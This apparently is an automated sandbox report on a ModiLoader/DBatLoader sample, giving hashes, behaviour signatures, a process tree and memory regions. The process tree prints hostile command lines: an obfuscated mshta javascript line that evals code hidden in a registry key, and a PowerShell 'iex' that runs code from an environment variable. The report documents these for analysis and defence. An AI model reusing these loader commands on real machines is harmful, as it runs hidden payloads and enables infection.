Analysis

  • max time kernel
    143s
  • max time network
    104s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-05-2024 06:31

General

  • Target

    38bba39c2139e77f4fecf128d25d583a_JaffaCakes118.exe

  • Size

    265KB

  • MD5

    38bba39c2139e77f4fecf128d25d583a

  • SHA1

    2fbc7c25b1909e4cadae63caec0b902967072b1f

  • SHA256

    6d9d58f592af50d202d9504db5ae94bef12903d6930d9cb0b7093a6eb6de662a

  • SHA512

    62daacb43e2e872bdbe3012432004b8ff642670e185ea534e7b32f16d06957eefb30715875beb7e6170a423c2a08015247cb12579866439908d323f5f6cd72d2

  • SSDEEP

    6144:AAZ4m1VLp8UBoCcp2XvUU+NK4JSaXhAzRTkaUHgX:AHmXo9XbJSaXmzRXUAX

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\38bba39c2139e77f4fecf128d25d583a_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\38bba39c2139e77f4fecf128d25d583a_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:916
    • C:\Users\Admin\AppData\Local\Temp\38bba39c2139e77f4fecf128d25d583a_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\38bba39c2139e77f4fecf128d25d583a_JaffaCakes118.exe"
      2⤵
        PID:2492
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:zjIm2LBZ="09sg1Pp";v8s=new%20ActiveXObject("WScript.Shell");Dmyq1iE="kSaCiE";z9RF8q=v8s.RegRead("HKLM\\software\\Wow6432Node\\pVbLM0\\KQM4sJ");JNP8DsOEP="l0mFmBdY";eval(z9RF8q);xwL62pmz="OVf8lduqk";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4088
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:imbt
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4644

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xp1tbl1i.qtz.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2492-7-0x0000000000400000-0x0000000000439000-memory.dmp
      Filesize

      228KB

    • memory/2492-8-0x0000000000400000-0x0000000000439000-memory.dmp
      Filesize

      228KB

    • memory/2492-9-0x00000000007A0000-0x0000000000874000-memory.dmp
      Filesize

      848KB

    • memory/2492-13-0x00000000007A0000-0x0000000000874000-memory.dmp
      Filesize

      848KB

    • memory/2492-12-0x00000000007A0000-0x0000000000874000-memory.dmp
      Filesize

      848KB

    • memory/2492-10-0x00000000007A0000-0x0000000000874000-memory.dmp
      Filesize

      848KB

    • memory/2492-11-0x00000000007A0000-0x0000000000874000-memory.dmp
      Filesize

      848KB

    • memory/2492-14-0x00000000007A0000-0x0000000000874000-memory.dmp
      Filesize

      848KB

    • memory/2492-15-0x00000000007A0000-0x0000000000874000-memory.dmp
      Filesize

      848KB

    • memory/2492-3-0x0000000000400000-0x0000000000439000-memory.dmp
      Filesize

      228KB

    • memory/4644-17-0x0000000004A60000-0x0000000004A96000-memory.dmp
      Filesize

      216KB

    • memory/4644-19-0x0000000005060000-0x0000000005082000-memory.dmp
      Filesize

      136KB

    • memory/4644-20-0x0000000005840000-0x00000000058A6000-memory.dmp
      Filesize

      408KB

    • memory/4644-18-0x0000000005210000-0x0000000005838000-memory.dmp
      Filesize

      6.2MB

    • memory/4644-21-0x00000000058B0000-0x0000000005916000-memory.dmp
      Filesize

      408KB

    • memory/4644-31-0x00000000059A0000-0x0000000005CF4000-memory.dmp
      Filesize

      3.3MB

    • memory/4644-32-0x0000000005E80000-0x0000000005E9E000-memory.dmp
      Filesize

      120KB

    • memory/4644-33-0x0000000005EC0000-0x0000000005F0C000-memory.dmp
      Filesize

      304KB

    • memory/4644-35-0x0000000006F20000-0x0000000006F3A000-memory.dmp
      Filesize

      104KB

    • memory/4644-34-0x0000000007680000-0x0000000007CFA000-memory.dmp
      Filesize

      6.5MB